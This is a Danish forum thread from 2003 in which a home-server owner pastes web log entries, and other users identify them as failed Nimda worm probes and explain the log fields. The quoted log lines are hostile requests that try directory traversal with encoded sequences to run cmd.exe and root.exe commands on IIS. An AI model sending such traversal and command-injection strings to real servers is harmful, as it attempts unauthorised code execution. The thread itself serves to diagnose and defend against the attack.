Kandu.dk - Er dette her et forsøg på "hacking"?


/ Forside / Teknologi / Internet / Sikkerhed / Nyhedsindlæg

Glemt dit kodeord?

Brugernavn*

Kodeord *

Husk mig

Brugerservice

Kom godt i gang

Bliv medlem

Seneste indlæg

Find en bruger

Stil et spørgsmål

Skriv et tip

Fortæl en ven

Pointsystemet

Kontakt Kandu.dk

Emnevisning

Kategorier

Alfabetisk

Karriere

Interesser

Teknologi

Reklame

Top 10 brugere

Sikkerhed

#	Navn	Point
1	stl_s	37026
2	arlet	26827
3	miritdk	20260
4	o.v.n.	12167
5	als	8951
6	refi	8694
7	tedd	8272
8	BjarneD	7338
9	Klaudi	7257
10	molokyle	6481

Er dette her et forsøg på "hacking"?
Fra : Ukendt

Dato : 07-06-03 21:17

80.164.53.10x- - [05/Jun/2003:21:25:59 +0200] "GET
/scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:00 +0200] "GET
/MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:02 +0200] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:04 +0200] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:06 +0200] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:08 +0200] "GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:10 +0200] "GET
/_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:12 +0200] "GET
/msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 565 0 "-" "-"
80.164.53.10x- - [05/Jun/2003:21:26:15 +0200] "GET
/scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:18 +0200] "GET
/scripts/..À/../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:20 +0200] "GET
/scripts/..À¯../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:23 +0200] "GET
/scripts/..Áœ../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:25 +0200] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:28 +0200] "GET
/scripts/..S5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
80.164.53.10x- - [05/Jun/2003:21:26:30 +0200] "GET
/scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 565 0 "-"
"-"
Det er fra loggen i min sambarserver og jeg syntes da at det ser lidt
underligt ud med de der commandpromt-ting og c+dir
jeg har fjernet det sidste tal i ip-nummeret i tilfælde af at det
skulle være noget ganske uskyldigt. Det siger i grunden heller ikke
mere end at det er en tdc-adsl kunde.
Jeg kører med en proudgave af zonealarm, men er det nok til at holde
folk fra at hacke?
Mvh Heinrich

Bent Sørensen (07-06-2003)

Kommentar
Fra : Bent Sørensen

Dato : 07-06-03 21:41

Hej,

"Heinrich Borchmann" <heinrich(snabela)borchmann.org> wrote in message
news:nhh4ev41tmbrkg4hn0vgd9koo90ipi5fgq@4ax.com...
> 80.164.53.10x- - [05/Jun/2003:21:25:59 +0200] "GET
> /scripts/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"
> 80.164.53.10x- - [05/Jun/2003:21:26:00 +0200] "GET
> /MSADC/root.exe?/c+dir HTTP/1.0" 404 565 0 "-" "-"

[snip]

> Det er fra loggen i min sambarserver og jeg syntes da at det ser lidt
> underligt ud med de der commandpromt-ting og c+dir
> jeg har fjernet det sidste tal i ip-nummeret i tilfælde af at det
> skulle være noget ganske uskyldigt. Det siger i grunden heller ikke
> mere end at det er en tdc-adsl kunde.

Det ligner en Nimda Orm, der forsøger at sprede sig. Se
følgende link for mere info:

http://www.cert.org/advisories/CA-2001-26.html

De entries du nævner, står under "System FootPrint".

/Bent

15kw (07-06-2003)

Kommentar
Fra : 15kw

Dato : 07-06-03 22:13

"Heinrich Borchmann" <heinrich(snabela)borchmann.org> skrev i
news:nhh4ev41tmbrkg4hn0vgd9koo90ipi5fgq@4ax.com

> Det er fra loggen i min sambarserver og jeg syntes da at det ser lidt
> underligt ud med de der commandpromt-ting og c+dir
> jeg har fjernet det sidste tal i ip-nummeret i tilfælde af at det
> skulle være noget ganske uskyldigt. Det siger i grunden heller ikke
> mere end at det er en tdc-adsl kunde.

Der er en computer der er inficeret med Nimda, som så prøver at inficere din
server, men det kan den ikke.

Du skal se efter hvad der står til sidst i linierne:
404 565 0 "-" "-"

404 = Not Found
565 = Er størrelsen i byte på den fejl mælding du smider tilbage.
0 = 0mSec
"-" url adressen som brugeren kom fra.
"-" Hvilken browser brugeren har.

Du kan prøve at gå ind i det dir der hedder syshelp og se filen LOGFMT.HTM

--
Hilsen
Peter N Petersen
http://peteropfinder.dk

Christian Andersen (07-06-2003)

Kommentar
Fra : Christian Andersen

Dato : 07-06-03 22:45

Heinrich Borchmann wrote:

> Jeg kører med en proudgave af zonealarm, men er det nok til at holde
> folk fra at hacke?

Andre har allerede svaret på, hvad de enkelte ting i loggen betyder.

Jeg vil bare henvise dig til følgende sider:

http://a.area51.dk/sikkerhed/hjemme_pc#firewall

og

http://a.area51.dk/sikkerhed/hjemme_net#fwbesked (samt næste afsnit)

--
Party time, excellent, wiuuuu, wiuuuu, wiuuuuuuu!!!

Ukendt (08-06-2003)

Kommentar
Fra : Ukendt

Dato : 08-06-03 01:05

On 7 Jun 2003 21:45:08 GMT, Christian Andersen
<i8qti5i02@sneakemail.com> wrote:

>Heinrich Borchmann wrote:
>
>> Jeg kører med en proudgave af zonealarm, men er det nok til at holde
>> folk fra at hacke?
>
>Andre har allerede svaret på, hvad de enkelte ting i loggen betyder.
>
>Jeg vil bare henvise dig til følgende sider:

Jeg takker for jeres svar Glad

Så ser det jo ud til at mine
sikkerhedsforanstaltninger virker........
Mvh Heinrich

Søg

Reklame

Statistik

Spørgsmål :	177548
Tips :	31968
Nyheder :	719565
Indlæg :	6408803
Brugere :	218887

Månedens bedste

Årets bedste

Sidste års bedste